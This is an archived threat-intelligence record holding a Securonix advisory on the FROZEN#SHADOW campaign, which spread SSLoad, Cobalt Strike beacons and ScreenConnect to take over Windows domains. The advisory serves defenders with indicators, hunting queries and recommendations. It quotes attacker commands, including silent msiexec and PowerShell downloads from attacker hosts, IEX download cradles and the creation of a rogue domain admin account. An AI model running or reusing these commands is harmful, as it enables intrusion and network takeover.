{
	"id": "63c25533-728d-4b65-8f0c-93694f54e732",
	"created_at": "2026-04-06T00:13:07.001276Z",
	"updated_at": "2026-04-10T03:21:10.417771Z",
	"deleted_at": null,
	"sha1_hash": "f39ec26a4d5807f2b5f154a15212bd60e84b9099",
	"title": "Securonix Threat Research Security Advisory: Analysis of Ongoing FROZEN#SHADOW Attack Campaign Leveraging SSLoad Malware and RMM Software for Domain Takeover",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2367540,
	"plain_text": "Securonix Threat Research Security Advisory: Analysis of Ongoing\r\nFROZEN#SHADOW Attack Campaign Leveraging SSLoad Malware\r\nand RMM Software for Domain Takeover\r\nArchived: 2026-04-05 20:18:33 UTC\r\nBy Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\ntldr:\r\nThe Securonix Threat Research team (STR) observed an interesting attack campaign which leveraged SSLoad malware\r\nand Cobalt Strike implants resulting in the attackers being able to pivot and take over the entire network domain.\r\nSSLoad malware was the primary vector deployed by threat actors during the FROZEN#SHADOW campaign along with\r\nCobalt Strike and ScreenConnect RMM (remote monitoring and management) software. SSLoad is designed to stealthily\r\ninfiltrate systems, gather sensitive information and transmit its findings back to its operators. Once inside the system,\r\nSSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection. Not to be confused with\r\nSLoader which gained traction between 2018 and 2020, SSLoader is relatively new to the malware scene.\r\nThe malware is typically introduced into the system through phishing email campaigns. Based on gathered telemetry,\r\nvictimology appears to be completely random, affecting targets in Asia, Europe and the Americas. The phishing emails\r\ncontain a single link which redirects from a mmtixmm[.]org URL to a single JavaScript file which is downloaded onto\r\nthe victim machine. Manually executing the single JavaScript file kicks off the code execution chain downloading and\r\nexecuting further stages.\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 1 of 14\n\nAfter the initial infection, the Threat Research team was able to observe the attackers installing RMM software, Cobalt\r\nStrike implants and moving laterally to other systems within the domain. In the end, the attackers were able to\r\ncompletely compromise the victim’s Windows domain by creating their own domain admin account.\r\nStage 1: Initial execution: JavaScript [T1059.007]\r\nThe JavaScript file out_czlrh.js boasted some interesting obfuscation methods which were used to evade antivirus\r\ndetections. As you can see in the figure below, each line of actual code was separated by massive comment blocks\r\nconsisting of randomly generated words. This amounted to thousands of lines of garbage code.\r\nThe useless comments drowned out the legitimate code so much that it caused the entropy of the file to drop\r\nsignificantly. Since they took up so much of the total code volume, the entropy looked incredibly flat when viewed in a\r\ngraph, hardly deviating from 4.478 on the Shannon entropy scale. A deviation this low would place the script into the\r\nrange of a standard text file, not too different from the classic “Lorem ipsum” text which scores only 4.179.\r\nFigure 1: JavaScript obfuscation and entropy (out_czlrh.js)\r\nWith the comments removed, the code is much easier to understand. Aside from the huge comment blocks, no other\r\nactual code obfuscation existed in the JavaScript code. To get an idea just how much of the script consisted of\r\ncommented out lines, once they were stripped out, the file size was reduced from 835 KB to just 20 KB, a whopping\r\n97.6% reduction!\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 2 of 14\n\nFigure 2: JavaScript obfuscation cleaned and entropy (out_czlrh.js)\r\nRemoving all of the useless commented lines, the code is much more readable, allowing us to understand its intent a bit\r\nbetter. It performs several functions to kick start next stage payloads.\r\nObject and variable initialization\r\nFirst, out_czlrh.js starts by creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject.\r\nFor the purposes of this script, these three objects will be used to interact with network drives and the local file system.\r\nWMI object: The portion of the script “GetObject(“winmgmts:\\\\\\\\.\\\\root\\\\cimv2”)” is used to access Windows\r\nManagement Instrumentation (WMI), which in this case is used so the script can perform simple command line\r\noperations.\r\nVariable setup: Variables are initialized to manage the number of connection attempts and the connection status to a\r\nnetwork share.\r\nDrive mapping and connection\r\nThe script then checks for available drive letters ranging from A to Z and tries to map a selected drive letter to a network\r\nshare located at \\\\wireoneinternet[.]info@80\\share\\ using a loop moving backwards from the letter Z.\r\nIf the script fails to map the drive after more than five attempts, it falls back to a direct network use command:\r\nCommand execution via WMI: Executes the command using WMI using “net use” to try to map the network drive\r\ndirectly without any form of drive letter persistence.\r\nPersistence check: After executing the command, it waits for three seconds (while in a loop) and then checks again if\r\nthe drive is mapped.\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 3 of 14\n\nMalicious payload execution\r\nIf a drive is successfully mapped, the script constructs a command to remotely install a .msi package from the mapped\r\nnetwork drive (slack.msi) using msiexec.exe.\r\nmsiexec.exe /i \\\\wireoneinternet[.]info@80\\share\\slack.msi /qn\r\nThe /qn flag at the end of the script represents “quiet, no UI”, meaning the installation will run silently without\r\ndisplaying any user interface. After executing msiexec, the script then attempts to dismount the network drive.\r\nStage 2: MSI file execution [T1218.007]\r\nAfter carefully analyzing the MSI file (slack.msi), it appears to closely resemble the BazarBackdoor. This particular\r\nbackdoor often associated with the notorious TrickBot malware gang, is a sophisticated malware designed primarily to\r\ninfiltrate networks and deploy further malicious payloads. It is part of a broader set of threats that typically leads to\r\nransomware attacks, data theft, and prolonged network compromise.\r\nAfter execution, we were able to observe the malware communicating with one of the following domains depending on\r\nthe sample:\r\nwireoneinternet[.]info\r\nskinnyjeanso[.]com\r\ntitnovacrion[.]top\r\nMaramaravilha[.]com\r\nglobalsolutionunlimitedltd[.]com\r\nThe main SSLoad malware payload was then downloaded and executed. The payload consisted of a semi-randomly\r\nnamed DLL file located in \\%APPDATA%\\local\\digistamp\\mbae-api-na.dll. Once executed via Rundll32.exe, it copies\r\nitself into %APPDATA%\\Custom_update\\. It then executes it in the same manner. In our case the following file was\r\ndownloaded and executed using the following syntax:\r\nrundll32.exe “C:\\Users\\\u003credacted\u003e\\appdata\\Roaming\\Custom_update\\Update_4319e68c.dll”, homi\r\nThe file is digitally signed, however with an invalid certificate. It attempts to masquerade as Malwarebytes Anti-Exploit\r\nsoftware. The legitimate Malwarebytes DLL is named the same (as the original DLL) and is typically located in\r\nC:\\Program Files\\Malwarebytes\\Anti-Malware\\mbae-api-na.dll.\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 4 of 14\n\nFigure 3: SSLoad DDL file details\r\nStage 3: Malware execution [T1218.007]\r\nAfter execution using the rundll32.exe command, the malware immediately began beaconing to two preconfigured C2\r\nservers: hxxps://skinnyjeanso[.]com/live/ and to hxxps://titnovacrion[.]top/live/. It then began collecting system and user\r\ndata for both the local host as well as domain related information. We observed the malware executing the following\r\nsystem commands through cmd.exe:\r\nexe /c ipconfig /all\r\nexe /c systeminfo\r\nexe /c nltest /domain_trusts\r\nexe /c nltest /domain_trusts /all_trusts\r\nexe /c net view /all /domain\r\nexe /c net view /all\r\nexe /c net group “domain admins” /domain\r\nexe /c wmic.exe /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get * /format:list\r\nexe /c net config workstation\r\nexe /c wmic.exe /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get displayname | findstr\r\n/v /b /c:displayname || echo no antivirus installed\r\nexe /c whoami /groups\r\nThe data generated was then sent via the HTTPS connection back to the attacker’s C2 servers. About an hour later, the\r\nattackers appeared to have manually executed some new commands, probably after validating that they appeared to be\r\non a legitimate server and not a honeypot. The following commands were executed:\r\nexe -c “[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding(‘utf-8’); cd\r\nc:\\; powershell”\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 5 of 14\n\nexe /groups\r\nexe group “domain admins” /dom\r\nexe /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get * /format:list\r\nThe commands sent by the attackers appear to manipulate and probe the server environment to prepare for the\r\ndeployment of next-stage malicious activities. First, powershell.exe -c to set the console’s input and output encoding to\r\nUTF-8, which ensures that any data handled (including non-English characters) is correctly processed. After that, they\r\nthen switched to the root of the C:\\ drive and started a new PowerShell session.\r\nOnce again, further enumeration of the current system and domain were conducted manually using the whoami, net and\r\nwmic commands.\r\nStage 4: Cobalt Strike execution\r\nSoon after executing manual commands on the system the attackers deployed a Cobalt Strike beacon on the system. This\r\nbecame the primary method of C2 communication between the attacker and the victim host machine.\r\nThe beacon file was dropped and executed manually via rundll32.exe using the following command:\r\nRundll32.exe C:\\ProgramData\\msedge.dll,MONSSMRpgaTQssmrpgatq\r\nWe observed the following network C2 communication originating from the Cobalt Strike beacon. All traffic was\r\nencrypted over port 443 (HTTPS).\r\nConnect URL Hostname\r\nhxxps://85.239.54[.]190/ws01cs03/g bjSdg0.pintaexoticfashion.co[.]in\r\nhxxps://23.159.160[.]88/ws01cs03/g l1-03.winupdate.us[.]to\r\nhxxps://23.95.209[.].148/ws01cs03/g 23-95-209-148-host.colocrossing[.]com:443\r\nThe Cobalt Strike configuration also contained the default string which is widely associated with Cobalt Strike activity,\r\nwhich can provide for a useful network-based indicator of compromise.\r\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r\nThrough Cobalt Strike the attackers downloaded and installed a ScreenConnect RMM software instance. We’ll discuss\r\nthe RMM connection in depth further down, however we observed the following commands executed from the Cobalt\r\nStrike instance:\r\nexe /c whoami /groups\r\nexe /c wmic /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get * /format:list\r\nexe /c iwr -uri “hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?\r\ne=access\u0026y=guest\u0026c=\u0026c=tjx-usa.com\u0026c=\u0026c=dc\u0026c=\u0026c=\u0026c=\u0026c=” -outfile c:\\programdata\\msedgeview.msi\r\nexe /c systeminfo\r\nexe /c msiexec.exe /i C:\\ProgramData\\Msedgeview.msi /quiet /qn\r\nThe commands first performed some general system enumeration using the whoami command as well as gathering\r\ninstalled antivirus software using wmic. Next, they proceeded to download a ScreenConnect install file from\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 6 of 14\n\nhxxps://t0talwar.screenconnect[.]com. The MSI installer file was downloaded and saved as\r\nC:\\ProgramData\\Msedgeview.msi and executed using msiexec.\r\nStage 5: RMM software [T1219]\r\nFor each host that the attackers pivoted to (including the domain controller) the attackers leveraged ScreenConnect (now\r\nknown as ConnectWise Control) to maintain full control on the system.\r\nDespite its legitimate uses, like many remote administration tools (RATs), ScreenConnect can be repurposed for\r\nmalicious intent. We’ve seen this several times in the past  in many malicious campaigns. This level of access facilitates\r\nvarious malicious activities including screen sharing, data exfiltration, lateral movement and the deployment of\r\nadditional malware payloads.\r\nLateral movement and Windows domain takeover [TA0008]\r\nWith full access to the system the threat actors began attempting to acquire credentials and gather other critical system\r\ndetails. At this stage they started scanning the victim host for credentials stored in files as well as other potentially\r\nsensitive documents.\r\nTo enumerate the network environment, the attackers executed Invoke-ShareFinder, Find-DomainShare and Get-DomainFileServer PowerShell commandlets. These modules are functions of PowerView and were also executed\r\nthrough the ScreenConnect instance. These modules assist in domain and network related information which could\r\nprovide valuable intel as to how to pivot to other hosts in the system. The Threat Research team observed its usage\r\nseveral times executed through a single PowerShell session:\r\nIEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:16226/’); Invoke-ShareFinder -\r\nCheckShareAccess -Verbose | Out-File -Encoding ascii C:\\ProgramData\\shda.txt\r\nIEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:52505/’); Find-DomainShare\r\nIEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:61390/’); Get-DomainFileServer\r\nNext, the threat actors attempted several methods of obtaining credentials. An account for a domain user was discovered\r\nand its credentials were eventually scraped by extracting them from browser credential stores.\r\nThe attackers also leveraged Cobalt Strike to extract credentials from LSASS, where they were able to obtain a domain\r\nadmin account NTLM hash. This allowed them to pivot to the network’s domain controller and eventually other critical\r\nservers including an SQL server and a mail server.\r\nWhile on the domain controller, the attackers created a new domain user using the following command below. The user\r\nwas patterned after a standard service account format to help it blend into the weeds by using the “svc_” prefix.\r\ncmd.exe /c net user svc_mail pass1234@ /add /domain\r\nNext the service account was added to the domain admins group:\r\ncmd.exe /c net group “domain admins” svc_mail /add /domain\r\nWrapping up\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 7 of 14\n\nAt this stage of the attack the threat actors were able to completely compromise the domain having achieved persistence\r\nthrough RMM software and creating a malicious domain admin account. With this level of access, they could get into\r\nany connected machine within the domain.\r\nIn the end, this is the worst case scenario for any organization as this level of persistence achieved by the attackers would\r\nbe incredibly time consuming and costly to remediate. However, in the end it highlights the necessity for detailed\r\nsecurity analytics and host telemetry to assist in preventing these types of infection chains before they become a much\r\nmore serious problem.\r\nSecuronix recommendations\r\nWhen it comes to successful breaches, phishing is still the #1 attack vector that threat actors are using to introduce\r\nmalware and compromise internal systems. It’s critical for front line users to be aware of the existence of these threats\r\nand how to spot them. Exercise caution around unsolicited emails, especially when the email is unexpected or employs a\r\nsense of urgency. When it comes to prevention and detection, the Securonix Threat Research team recommends:\r\nAvoid downloading files or attachments from external sources, especially if the source was unsolicited. Common\r\nfile types include zip, rar, iso, and pdf. Zip files were used during this campaign.\r\nMonitor common malware staging directories, especially script-related activity in world-writable directories. In\r\nthe case of this campaign the threat actors staged in subdirectories in C:\\ProgramData as well as the user’s\r\n%APPDATA%\r\nThrough various phases of the FROZEN#SHADOW campaign, the threat actors leveraged encrypted channels\r\nover port 443 to evade detection. Because of this, we strongly recommend deploying robust endpoint logging\r\ncapabilities. This includes leveraging additional process-level logging such as Sysmon and PowerShell logging\r\nfor additional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nCommand and Control\r\nT1071.002: Application Layer Protocol: File Transfer Protocols\r\nT1102: Web Service\r\nT1219 – Remote Access Software\r\nT1573: Encrypted Channel\r\nDefense Evasion\r\nT1070.004: Indicator Removal: File Deletion\r\nT1218.007: System Binary Proxy Execution: Msiexec\r\nT1218.011: System Binary Proxy Execution: Rundll32\r\nDiscovery\r\nT1033: System Owner/User Discovery\r\nT1057: Process Discovery\r\nT1069.002: Permission Groups Discovery: Domain Groups\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1518.001: Software Discovery: Security Software Discovery\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 8 of 14\n\nTactics Techniques\r\nExecution\r\nT1047: Windows Management Instrumentation\r\nT1059: Command and Scripting Interpreter\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nPersistence T1078.002: Valid Accounts: Domain Accounts\r\nRelevant provisional Securonix detections\r\nEDR-ALL-159-RU\r\nEDR-ALL-185-ER\r\nEDR-ALL-1171-ERR\r\nWEL-ALL-1179-RU,EDR-ALL-1205-RU\r\nEDR-ALL-1206-RU,WEL-ALL-1189-RU\r\nEDR-ALL-1275-ERR\r\nPSH-ALL-120-RU,EDR-ALL-1153-RU\r\nPSH-ALL-233-RU\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND rg_functionality=”Next Generation Firewall” AND (requesturl CONTAINS\r\n“winarkamaps[.]com” OR requesturl CONTAINS “stratimasesstr[.]com” OR requesturl CONTAINS\r\n“danteshpk[.]com” OR requesturl CONTAINS “sokingscrosshotel[.]com” OR requesturl CONTAINS\r\n“kasnackamarch[.]info” OR requesturl CONTAINS “simplyfitphilly[.]com” OR requesturl CONTAINS\r\n“skinnyjeanso[.]com” OR requesturl CONTAINS “titnovacrion[.]top” OR requesturl CONTAINS\r\n“wireoneinternet[.]info” OR requesturl CONTAINS “t0talwar.screenconnect[.]com” OR requesturl CONTAINS\r\n“maramaravilha[.]com” OR requesturl CONTAINS “globalsolutionunlimitedltd[.]com” OR requesturl\r\nCONTAINS “maramaravilha[.]com” OR requesturl CONTAINS “krd6[.]com”)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “85.239.54[.]190” OR\r\ndestinationaddress = “23.159.160[.]88” OR destinationaddress = “23.95.209[.]148” OR destinationaddress =\r\n“45.95.11[.]134”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS\r\n“Net.Webclient” AND message CONTAINS “http://127.0.0.1:” AND message CONTAINS “Out-File” AND\r\nmessage CONTAINS “IEX”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process\r\nCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR\r\ndeviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\nresourcecustomfield1 CONTAINS “\\Appdata\\Roaming\\Custom_update\\” AND resourcecustomfield1\r\nCONTAINS “\\Appdata\\Local\\digistamp\\”\r\nC2 and infrastructure\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 9 of 14\n\nC2 Address\r\n85.239.54[.]190\r\n23.159.160[.]88\r\n23.95.209[.]148\r\n45.95.11[.]134\r\nbjSdg0.pintaexoticfashion.co[.]in\r\nl1-03.winupdate.us[.]to\r\n23-95-209-148-host.colocrossing[.]com:443\r\nmmtixmm[.]org\r\nwireoneinternet[.]info\r\nskinnyjeanso[.]com\r\ntitnovacrion[.]top\r\nsimplyfitphilly[.]com\r\nkasnackamarch[.]info\r\nsokingscrosshotel[.]com\r\ndanteshpk[.]com\r\nstratimasesstr[.]com\r\nwinarkamaps[.]com\r\nglobalsolutionunlimitedltd[.]com\r\nmaramaravilha[.]com\r\nkrd6[.]com\r\nhxxps://t0talwar.screenconnect[.]com\r\nAnalyzed files/hashes\r\nFile Name SHA256\r\nout_czlrh.js DB265EA1732935F61E8D0F7A20A8ADC54E20AF71B3CF4A737714CD3377C838F6\r\nout_bdrts.js FAD25892E5179A346CDBDBBA1E40F53BD6366806D32B57FA4D7946EBE9AE8621\r\nLetter_c89_00c568610-\r\n93e92634a4425-\r\nF8FC9B40B946B742D6044F291914439727E1A7F53EA87562446F682B26CCE65A\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 10 of 14\n\nFile Name SHA256\r\n2643w5.js\r\nLetter_p64_18t678677-\r\n53r17785m9284-\r\n51810.js\r\nE8979741F0355A47DAE575EAD8C829DF47F282B4533EC1BE4D63086515F9C449\r\nLetter_h85_79o750478-\r\n05f74851h3126-\r\n2101c9.js\r\n08E82F1C0A033AB295B4D342C53970E4528E20933C614BDA3BBC5D57BAB20651\r\nLetter_e97_58z949277-\r\n25h33503u6712-\r\n8630h9.js\r\n4F52B4A2A781F366ED534D8C4B2FAFEF48A7848C4C20B4229B98747CA8AB06D3\r\nLetter_n95_52a858194-\r\n29r719420963-\r\n6497k0.js\r\n68E1CAF530366B1890993185157C01161B3D625063D75A41C88D2D1BB8EDFE02\r\nLetter_n54_61h288642-\r\n67072023a7462-\r\n0068w3.js\r\n6D7A94B7551F15732E193A07357375B98B463F0DCE6B1FED871A42FCBDDE9F48\r\nLetter_w54_49a010638-\r\n34d3814907559-\r\n826708.js\r\n2B026343214C3D2C10FDFA9B04B7694E57EE8D3605FBF9A2E127FE6FA9A58309\r\nLetter_a51_80q687203-\r\n83q18993e4985-\r\n2463m8.js\r\n96212917B7B0DC881332DB7ECE0BACFE21D9AC713AF1ABE078F6D3E74BAACD01\r\nLetter_k40_07w820587-\r\n40d85841n3311-\r\n9847w6.js\r\nBA3FA920708DB856737A66F70E2C7E86BBA73C73836F7F30C2CE42CD70D0C5BD\r\nLetter_w45_72u406742-\r\n64b48323u0125-\r\n6834a8.js\r\n7DBEBB7C76511FC063B5ACE0A9359B655F66A55A494200B8FD11905C78B5FB90\r\nLetter_c41_84a683017-\r\n72b44707a1598-\r\n464809.js\r\n6E892AA13CBD4B71A1C476207ABDDB1EF830BE04999809B4EF569488A37E47E0\r\nLetter_d94_87w030300-\r\n54q44583y8818-\r\n2571b1.js\r\n7DFF08656413A737483ECEE2A50E412338EBFEE3D36A1A5C04E74B25949B2306\r\nLetter_n42_88u446059-\r\n37f35802c4925-\r\n75DB4709428310C76656BF76F5DE267AB490E43284312B374BAF7582108300A9\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 11 of 14\n\nFile Name SHA256\r\n3726c4.js\r\nLetter_q50_63b944998-\r\n11n0283407179-\r\n6803z4.js\r\nC172ABD808CC6216B309BC307FE69B821C7EAED35F874FD4684AB33B4291F95A\r\nLetter_u79_20w517865-\r\n65u0451500340-\r\n7186n6.js\r\n5FB093A9348FCF4A81BEFDA978C948796A8319FCABE7899C2CF5BA1419EC9D35\r\nDoc_k33_80c092144-\r\n18b83503a0451-\r\n2328f3.js\r\n9FC48724CB9F70F774F7ED9E809E49979BD089DFD641896D8D5E3026F049B0AF\r\nDoc_d43_77n194090-\r\n93d18260r9745-\r\n8376n8.js\r\nC122596E25A4DAD1D46D4AB983F4EF15BFA7B65582B7C311F404036766498105\r\nDoc_i93_65b929565-\r\n14q83944h2246-\r\n4336m9.js\r\nE8E76B851FC78D87FE58AD7D29BC6356A8965236D1B96C5F572334DD695D5DE9\r\nDoc_f98_58y658432-\r\n41b75184w6866-\r\n3921d1.js\r\n791C28D4201E8B9EA5162FBEE3908FEB34793B1C51F5AAEDC43916E86068248D\r\nDoc_q80_66b246938-\r\n8806024o9126-\r\n5008b9.js\r\nCAF8295570E8A8244C7099A8EABFD1BD55EA50F026B4461E9F0F5425D54703E8\r\nDoc_m42_81h118103-\r\n88o62135w8623-\r\n1999q9.js\r\n092962BC268390DEBF17CD148D03147CDF919E442E61C92DE01EAC3BDB34B1C1\r\nDoc_q35_64r067638-\r\n76a88713i3606-\r\n7493z7.js\r\n24CB279EEBCD49E1327905AB2BD19B9B2E09EFA3E0A5E1875F3989C398A5DA81\r\nLetter_a53_97o318845-\r\n76f99823h9630-\r\n6740o2.js\r\n8F7A90B540F38712C9C1A5359C6333BBE1091102D6F621B22321E08352C84CFC\r\nLetter_d94_87w030300-\r\n54q44583y8818-\r\n2571b1.js\r\n7DFF08656413A737483ECEE2A50E412338EBFEE3D36A1A5C04E74B25949B2306\r\nLetter_e79_76r514120-\r\n22p50913h4206-\r\n0737FA0B403FAB17331C9835497A4F3B2955543E2FAC85009DCC66DF41A015F8\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 12 of 14\n\nFile Name SHA256\r\n6851k8.js\r\nLetter_h21_36b948317-\r\n03a99748y3026-\r\n8660b8.js\r\n2118C5B95D5D57492B2E8B8C0403E23B21ACC4FF50282F8B6007BA89ADFAA992\r\nLetter_d19_97q517001-\r\n52z26072a2831-\r\n7463c5.js\r\nA557F891F4D50E458D745C7EAF7D0BE3ECEEA36F0398097E977CD3F6EC463875\r\nLetter_t47_39u197519-\r\n27b72941k6563-\r\n0250a2.js\r\n4D9274CFE7A2BD9A125352271D1634708E1F9B1D70B056D1C1950CB98B8F91FF\r\nLetter_z27_59o257127-\r\n14z25707d6443-\r\n0555c6.js\r\n3584CA9C1E7E0A38E47F59BB16C21203A60833D0F826294D535A98E7CA76D9C1\r\nLetter_b42_17m561933-\r\n22h44391r3880-\r\n8554u2.js\r\n63283E012F067A3FFB27ED4FE6803F740C80F6F65213FE5507F0CD1EE0019B96\r\nLetter_t48_42a243569-\r\n81n19660f9965-\r\n6999u0.js\r\n828EF3E4CA064891836913015C48AC9807ECD43B32F6E7E4BFF29B9FD2E218C9\r\nLetter_o40_58g357086-\r\n56q83656a4371-\r\n9752z1.js\r\n780B970DAD15835D138546BE9B615FC1B4124C1060A8EFD91B9C52F9C3160D5B\r\n09E7F7428E6ECC68EF036C0751F53985882F6760CF3892F1D26AF44F3B9730DE\r\nmsedgeview.msi 232F8F8DC9E5B9723C43C78CB942CC810EF56E305E4BD650110A484334F568A8\r\n950b84.msi F5BF914415FAF7587958BBDC3312536FD9ABEA647F1541D44D2E757F0E683650\r\n6838aa.msi 08075E8A6DCC6A5FCA089348EDBD5FC07B2B0B26A26A46E0DD401121FDAA88D3\r\n4178fc.msi FF5E40FC794E56FD78FEB6EB6B30794970F7CDB4A767C4095E2D20A90BB0EFE8\r\nslack.msi B9DBE9649C761B0EEE38419AC39DCD7E90486EE34CD0EB56ADDE6B2F645F2960\r\nqual.msi EE1E5B80A1D3D47C7703EA2B6B64EE96283AB3628EE4FA1FEF6D35D1D9051E9F\r\navp.msi DCAE57EC4B69236146F744C143C42CC8BDAC9DA6E991904E6DBF67EC1179286A\r\nmsedge.dll 7018C43EE38190EAE122797869865FD808817F31D766575B43B118AE176C0C68\r\nUpdate_c7e5e126.dll FC21A125287C3539E11408587BCAA6F3B54784D9D458FACBC54994F05D7EF1B0\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 13 of 14\n\nFile Name SHA256\r\nUpdate_2ffaca76.dll 65DA6D9F781FF5FC2865B8850CFA64993B36F00151387FDCE25859781C1EB711\r\nUpdate_8d74674.dll 805B59E48AF90504024F70124D850870A69B822B8E34D1EE551353C42A338BF7\r\nUpdate_17a3b1e7.dll 7206EAFC475F246E7C9C258AFDAAA64B5193C1C7427D927BE417E53DEC890078\r\nmbae-api-na.dll\r\n9856B816A9D14D3B7DB32F30B07624E4BCDA7F1E265A7BB7A3E3476BFD54A759\r\n0EDE3CBE821E4F083FC119274F069C77E64A6A7E8A2C16530317B826A0939979\r\n17DDC339B14845BC9D67C5C3CD9A0E617387CC0569131FF3641035D82043EFFA\r\n18D60C9C807DA021BC2C31E3BA7EC2737865A8C96060134CAA3CF033E43E26FE\r\nAE610EB8F8622653B9BE9692A7D2A680B0C2154022704CA58AF0EAEED0066D03\r\n7F97ADFF1D298CCF1F3C7991FCB01008DDA22722EBBC11AF48FCBF2ADB58AFB4\r\nforcedelctl.dll 3BCA1DCAEF4430272B9029C9A4BC8BE0D45ECFF66E8DE8679ED30D8AFAB00F6F\r\nReferences:\r\n1. Elegant sLoad Carries Out Spying, Payload Delivery in BITS\r\nhttps://threatpost.com/sload-spying-payload-delivery-bits/151120/\r\n2. Github:Unit42-timely-threat-intel /2024-04-15-IOC-for-Contact-Forms-campaign-SSLoad-activity.txt\r\nhttps://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-04-15-IOC-for-Contact-Forms-campaign-SSLoad-activity.txt\r\n3. Github: Malware-IOCs/2024-04-17 SSLoad https://github.com/executemalware/Malware-IOCs/blob/main/2024-\r\n04-17%20SSLoad%20IOCs\r\n4. Github: xx0hcd/Malleable-C2-Profiles\r\nhttps://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/template.profile\r\n5. Securonix Threat Research Knowledge Sharing Series: On Detection of Real-world Attacks Involving RMM\r\nBehaviors Using Securonix\r\nhttps://www.securonix.com/blog/securonix-threat-research-knowledge-sharing-series-detecting-rmm-behaviors/\r\n6. Hundreds of orgs targeted with emails aimed at stealing NTLM authentication hashes\r\nhttps://www.helpnetsecurity.com/2024/03/05/steals-ntlm-hashes-email/\r\nSource: https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/"
	],
	"report_names": [
		"securonix-threat-research-security-advisory-frozenshadow-attack-campaign"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434387,
	"ts_updated_at": 1775791270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f39ec26a4d5807f2b5f154a15212bd60e84b9099.pdf",
		"text": "https://archive.orkl.eu/f39ec26a4d5807f2b5f154a15212bd60e84b9099.txt",
		"img": "https://archive.orkl.eu/f39ec26a4d5807f2b5f154a15212bd60e84b9099.jpg"
	}
}